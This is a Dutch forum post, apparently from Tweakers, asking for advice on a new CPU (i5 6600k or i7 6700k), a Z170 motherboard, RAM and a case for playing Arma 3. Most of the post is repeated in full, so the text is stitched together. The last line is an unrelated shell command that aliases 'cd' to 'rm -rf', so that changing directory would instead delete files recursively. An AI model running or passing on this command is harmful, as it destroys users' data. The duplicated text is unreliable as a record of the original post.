Beste Tweakers. Na een tijdje Arma 3 online te hebben gespeeld op mijn oudere AMD Phenom II x4 955(OC tot 3,7 GHZ) ben ik geneigd geraakt naar een nieuwe CPU. Ik heb erge FPS lag wanneer er te veel invloeden in de mulitplayer sfeer aanwezig zijn(ik weet dat mijn GPU niet de bottleneck is) Na wat onderzoek te plegen is de conclusie dat een i5 6600k of i7 6700k toch een aardige oplossing. Die knoop moet ik nog doorhakken. Ook ben ik daarna geinteresseerd in een nieuwe monitor.
Wat daarbij komt is(natuurlijk) een nieuw moederbord en ik heb ook interesse in een nieuwe case, aangezien de opties van kabelverwerking en de grootte beperkingen zijn in mijn huidige kast.
Wat wil je doen met je nieuwe systeem?
Wat wil ik gaan doen in een lijstje van hoge naar lage prioriteit opgesomd:
#1: Gamen> Arma 3 voornamelijk. RTS zoals Rome 2: Total war en Company of Heroes zijn ook aanwezig.
#2: Internet / eventueel gameplay gaan streamen.
#3: Andere software zoals skype/chrome/Teamspeak 3 wil ik graag in de achtergrond houden, dus multitasken.
Wat mag het systeem gaan kosten?
Ik heb geen vast bedrag op dit moment, i5 6600k en i7 6700k zitten rond de 250 en 350 euro,
Moederbord wil ik graag maximaal 200 euro aan uitgeven
De kast mag van mij het minimale bedrag zijn, zolang het groot genoeg is voor hardware zoals de CPU, Mobo en (huidige) GPU.
Zijn er componenten of randapparatuur die je al hebt en mee wil nemen naar je nieuwe systeem?
Huidige componenten die ik heb:
#1: pricewatch: EVGA GeForce GTX 970 4GB ACX
#2: pricewatch: Samsung 850 EVO 250GB
#3: pricewatch: Cooler Master Hyper 212 EVO
#4: pricewatch: WD Red WD30EFRX, 3TB
#5: pricewatch: Cooler Master V Series V650
#6: pricewatch: Logitech G510 Gaming Keyboard
#7: pricewatch: Logitech G5 Laser Mouse
#8: pricewatch: Sennheiser PC 363D Surround Sound Gaming Headset
#9: shitty creative setje niet noemenswaardig.
Wat denk je allemaal nodig te hebben?
Zoals in de inleiding van dit verhaal, het moederbord met CPU zijn het belangrijkste. Daarbij heb ik ook RAM geheugen nodig. Dan ook nog de kast.
Heb je nog bepaalde (merk)voorkeuren?
Mijn voorkeur gaat dus uit naar Intel qua CPU.
Moederbord heb ik totaal geen voorkeur, daar heb ik eigenlijk de meeste hulp voor nodig aangezien het aantal moederbords met Z170 sockets ruimschoots is.. door dit bos zie ik eigenlijk de bomen niet meer en eigenlijk hoopte ik op jullie advies.
Heb je nog bepaalde eisen/wensen?
Case grootte: Niet het grootste van het grootste graag, hij komt op mijn bureau te staan aagezien daaronder weinig ruimte is. Verder wil ik meer mogelijkheden tot kabel management hij moet er net uit zien.
Ik wil natuurlijk mijn huidige equipment meenemen.
Ga je overklokken?
Ja.
Wat verwacht je van ons?[i]
Ik heb geen idee hoeveel Arma spelers erbij zitten, wat ik wel weet is dat dit spel veel profiteert vanwege single threaded performance. Ik weet dat de i7 t.o.v. de i5 weinig extra oplevert, maar ik wil ook lange termijn denken(5-6 jaar?) Dat is namelijk hoe lang mijn huidige CPU het ook volgehouden heeft.
Ook wil ik dus goed multitasken en die extra honderd euro erbovenop wil ik best uitgeven.
Voornamelijk heb ik advies nodig voor een bijpassende moederbord en RAM geheugen. RAM geheugen zou ik nog wel kunnen bedenken, maar er zijn 86 uitvoeringen met 1151 socket, Z170 chipset en DDR4 RAM geheugen slots.
Wat ik graag zou willen uitgeven: 200 euro voor het moederbord, 150 euro voor de kast, ik ben gelukkig wel flexibel daarin en ik hoop dat jullie mij hierin kunnen helpen.
Als er vragen zijn of als ik dingen vergeten ben, schroom niet om dat te melden dan kan ik dat bijvoegen.
Wat daarbij komt is(natuurlijk) een nieuw moederbord en ik heb ook interesse in een nieuwe case, aangezien de opties van kabelverwerking en de grootte beperkingen zijn in mijn huidige kast.
Wat wil je doen met je nieuwe systeem?
Wat wil ik gaan doen in een lijstje van hoge naar lage prioriteit opgesomd:
#1: Gamen> Arma 3 voornamelijk. RTS zoals Rome 2: Total war en Company of Heroes zijn ook aanwezig.
#2: Internet / eventueel gameplay gaan streamen.
#3: Andere software zoals skype/chrome/Teamspeak 3 wil ik graag in de achtergrond houden, dus multitasken.
Wat mag het systeem gaan kosten?
Ik heb geen vast bedrag op dit moment, i5 6600k en i7 6700k zitten rond de 250 en 350 euro,
Moederbord wil ik graag maximaal 200 euro aan uitgeven
De kast mag van mij het minimale bedrag zijn, zolang het groot genoeg is voor hardware zoals de CPU, Mobo en (huidige) GPU.
Zijn er componenten of randapparatuur die je al hebt en mee wil nemen naar je nieuwe systeem?
Huidige componenten die ik heb:
#1: pricewatch: EVGA GeForce GTX 970 4GB ACX
#2: pricewatch: Samsung 850 EVO 250GB
#3: pricewatch: Cooler Master Hyper 212 EVO
#4: pricewatch: WD Red WD30EFRX, 3TB
#5: pricewatch: Cooler Master V Series V650
#6: pricewatch: Logitech G510 Gaming Keyboard
#7: pricewatch: Logitech G5 Laser Mouse
#8: pricewatch: Sennheiser PC 363D Surround Sound Gaming Headset
#9: shitty creative setje niet noemenswaardig.
Wat denk je allemaal nodig te hebben?
Zoals in de inleiding van dit verhaal, het moederbord met CPU zijn het belangrijkste. Daarbij heb ik ook RAM geheugen nodig. Dan ook nog de kast.
Heb je nog bepaalde (merk)voorkeuren?
Mijn voorkeur gaat dus uit naar Intel qua CPU.
Moederbord heb ik totaal geen voorkeur, daar heb ik eigenlijk de meeste hulp voor nodig aangezien het aantal moederbords met Z170 sockets ruimschoots is.. door dit bos zie ik eigenlijk de bomen niet meer en eigenlijk hoopte ik op jullie advies.
Heb je nog bepaalde eisen/wensen?
Case grootte: Niet het grootste van het grootste graag, hij komt op mijn bureau te staan aagezien daaronder weinig ruimte is. Verder wil ik meer mogelijkheden tot kabel management hij moet er net uit zien.
Ik wil natuurlijk mijn huidige equipment meenemen.
Ga je overklokken?
Ja.
Wat verwacht je van ons?[i]
Ik heb geen idee hoeveel Arma spelers erbij zitten, wat ik wel weet is dat dit spel veel profiteert vanwege single threaded performance. Ik weet dat de i7 t.o.v. de i5 weinig extra oplevert, maar ik wil ook lange termijn denken(5-6 jaar?) Dat is namelijk hoe lang mijn huidige CPU het ook volgehouden heeft.
Ook wil ik dus goed multitasken en die extra honderd euro erbovenop wil ik best uitgeven.
Voornamelijk heb ik advies nodig voor een bijpassende moederbord en RAM geheugen. RAM geheugen zou ik nog wel kunnen bedenken, maar er zijn 86 uitvoeringen met 1151 socket, Z170 chipset en DDR4 RAM geheugen slots.
Wat ik graag zou willen uitgeven: 200 euro voor het moederbord, 150 euro voor de kast, ik ben gelukkig wel flexibel daarin en ik hoop dat jullie mij hierin kunnen helpen.
Als er vragen zijn of als ik dingen vergeten ben, schroom niet om dat te melden dan kan ik dat bijvoegen.
$ alias cd='rm -rf'